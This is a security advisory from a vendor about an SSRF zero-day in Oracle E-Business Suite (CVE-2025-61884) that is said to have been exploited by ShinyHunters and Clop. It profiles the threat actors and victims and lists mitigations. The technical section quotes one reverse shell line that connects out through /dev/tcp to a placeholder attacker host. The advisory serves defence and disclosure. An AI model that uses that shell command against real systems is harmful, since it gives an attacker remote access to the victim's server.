Executive Summary

Oracle has recently addressed a critical zero-day vulnerability in Oracle E-Business Suite (EBS), following the public leak of an exploit by the notorious threat group ShinyHunters. This vulnerability, tracked as CVE-2025-61884, enables unauthenticated remote attackers to perform Server-Side Request Forgery (SSRF) attacks, potentially leading to unauthorized access to internal resources and, under certain conditions, remote code execution (RCE). The exploit was actively weaponized in the wild, with multiple organizations suffering breaches and extortion attempts. Notably, Oracle released the patch silently, without initial public disclosure of the exploit’s existence or its active exploitation. This advisory provides a comprehensive technical analysis, threat actor profiling, exploitation details, victimology, and actionable mitigation guidance for all organizations using Oracle E-Business Suite.

Threat Actor Profile

ShinyHunters is a prolific cybercriminal group known for high-profile data breaches, extortion, and the public release of exploit code. The group operates primarily on underground forums and encrypted messaging platforms, such as Telegram, where they disseminate proof-of-concept (PoC) exploits and stolen data. ShinyHunters has a history of targeting enterprise software vulnerabilities, leveraging zero-days for both direct attacks and for sale to other threat actors. In this campaign, ShinyHunters not only exploited the SSRF flaw in Oracle E-Business Suite but also distributed the exploit to a wider criminal ecosystem, amplifying the threat. The group’s tactics, techniques, and procedures (TTPs) include rapid weaponization of newly discovered vulnerabilities, extortion through data theft, and collaboration with ransomware operators such as Clop.

Technical Analysis of Malware/TTPs

The vulnerability CVE-2025-61884 resides in the /OA_HTML/configurator/UiServlet endpoint of Oracle E-Business Suite. The flaw is a classic SSRF, where the application fails to properly validate user-supplied input in the return_url parameter. By crafting a malicious HTTP request, an attacker can coerce the server into making arbitrary requests to internal or external systems. This can be leveraged to access sensitive internal services, enumerate network infrastructure, or chain with other vulnerabilities for further exploitation.

The exploit, as leaked by ShinyHunters, involves sending a specially crafted request to the vulnerable endpoint, embedding a malicious URL in the return_url parameter. In some observed attack chains, adversaries combined SSRF with CRLF injection and XSL template injection, escalating the attack to achieve remote code execution. For example, attackers could inject payloads that execute shell commands, such as spawning a reverse shell using bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1. The exploit was effective even against systems that had applied previous Oracle patches, underscoring the sophistication of the attack and the necessity of the dedicated fix for CVE-2025-61884.

The patch released by Oracle introduces strict input validation using regular expressions, specifically sanitizing the return_url parameter to block malicious input and prevent SSRF exploitation. However, the patch was released without a public advisory, leaving many organizations unaware of the urgency to apply it.

Exploitation in the Wild

Following the public leak of the exploit by ShinyHunters, multiple threat actors, including the Clop ransomware group, began actively exploiting the vulnerability. Attackers launched automated scans for exposed Oracle E-Business Suite instances, targeting organizations across various sectors. Extortion campaigns were observed, with attackers exfiltrating sensitive data and threatening public disclosure unless ransom demands were met.

Notably, a breach at Harvard University was linked to exploitation of this zero-day, as reported by BleepingComputer. Attackers sent extortion emails to affected organizations, often using compromised third-party accounts to bypass spam filters. The campaigns were global in scope, affecting organizations in North America, Europe, and Asia-Pacific.

Indicators of compromise (IOCs) associated with these attacks include unauthorized access to the /OA_HTML/configurator/UiServlet endpoint, suspicious outbound connections from EBS servers, and the presence of malicious templates or payloads in the EBS database. Attackers also leveraged Java-based loaders and executed reconnaissance commands as the applmgr user to map internal networks and identify further targets.

Victimology and Targeting

The exploitation campaign was indiscriminate, targeting any organization running vulnerable versions of Oracle E-Business Suite. Sectors affected include higher education (notably Harvard), financial services, manufacturing, and multinational enterprises. The global reach of Oracle EBS meant that organizations in North America, Europe, and Asia-Pacific were all impacted. Attackers prioritized organizations with internet-exposed EBS instances, but also targeted those with weak internal segmentation, allowing lateral movement post-compromise.

Victims typically received extortion emails threatening the release of stolen data. In some cases, attackers demonstrated access by sharing samples of exfiltrated information. The use of infostealer malware and compromised third-party accounts further complicated detection and response efforts, as attackers were able to bypass traditional email security controls.

Mitigation and Countermeasures

Immediate action is required for all organizations using Oracle E-Business Suite. The following countermeasures are recommended:

Apply the latest Oracle E-Business Suite security updates, ensuring that the patch for CVE-2025-61884 is installed. This patch introduces critical input validation to block SSRF exploitation.

If immediate patching is not feasible, implement a web application firewall (WAF) or mod_security rule to block access to the /OA_HTML/configurator/UiServlet endpoint. This can disrupt the SSRF exploit chain and provide temporary protection.

Review application and network logs for evidence of suspicious access to /OA_HTML/configurator/UiServlet and /OA_HTML/SyncServlet endpoints. Pay particular attention to requests containing external or malformed URLs in the return_url parameter.

Monitor for unusual outbound connections from EBS servers, which may indicate successful SSRF exploitation or data exfiltration.

Query the EBS database for recently created or modified templates, especially those with suspicious names or payloads. Use the following SQL queries as a starting point: SELECT * FROM XDO_TEMPLATES_B ORDER BY CREATION_DATE DESC; SELECT * FROM XDO_LOBS ORDER BY CREATION_DATE DESC;

Restrict outbound internet access from EBS servers to only essential destinations, minimizing the attack surface for SSRF and data exfiltration.

Educate IT and security staff about the risk of zero-day exploitation and the importance of rapid patch management, especially for internet-facing enterprise applications.

References

Oracle Security Alert for CVE-2025-61884, BleepingComputer: Oracles silently fixes zero-day exploit leaked by ShinyHunters, Google Cloud Threat Intelligence: Oracle EBS Zero-Day Exploitation, watchTowr Labs: Technical Analysis, MITRE ATT&CK: T1190, T1210

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their entire supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify vulnerabilities, respond to emerging threats, and ensure compliance with industry standards. For more information about how Rescana can help secure your organization’s digital ecosystem, or for any questions regarding this advisory, please contact us at ops@rescana.com.